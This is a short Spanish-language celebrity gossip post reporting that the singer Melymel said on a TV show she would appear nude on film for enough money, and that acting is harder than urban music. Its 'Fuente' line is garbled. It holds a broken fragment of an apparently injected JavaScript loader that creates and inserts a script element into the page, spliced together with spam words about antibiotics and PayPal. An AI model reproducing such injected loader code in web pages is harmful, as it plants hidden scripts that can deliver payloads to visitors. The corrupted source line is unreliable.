Home / Publicaciones / Rincon Urbano / Melymel Desnuda Para El Cine

Melymel Desnuda Para El Cine

Melymel afirmo que si le entregan la cantidad adecuada de dinero podría desnudarse para la pantalla grande.< !more> Sin vergüenza enseñaría hasta la parte más oculta de su cuerpo.

“Si me ofrecen algunos millones de los verdes, enseñaría hasta las bendiciones. Si me dicen que tengo que ser un poco más atrevida por una suma importante de dinero, o sea, prefiero tener el efectivo seguro a estar lamentándome haciéndome la pregunta ¿Por qué no lo hice?, dijo.

Las declaraciones de Melymel fueron realizadas en el programa Bien de Bien en el segmento Misa y Vacilón que se transmite los domingos, la interprete dijo que los comentaristas de cine del país le dieron un chance, y no descartara seguir haciendo cine en otras oportunidades.

“Si los críticos de cine son fuertes y tienen buen ojo para que no se le escape nada, me dieron la oportunidad, así que puedo seguir haciendo mis diligencias”, explico que para una mujer es más fácil triunfar en la música urbana que en el cine, porque la actuación es muy exigente mientras que en la música es más fácil debido a que si no sabes componer un tema urbano solo tienes que pagarle a alguien que lo haga por ti.

Fuente: bureodocument.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’); antibiotics paypal

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...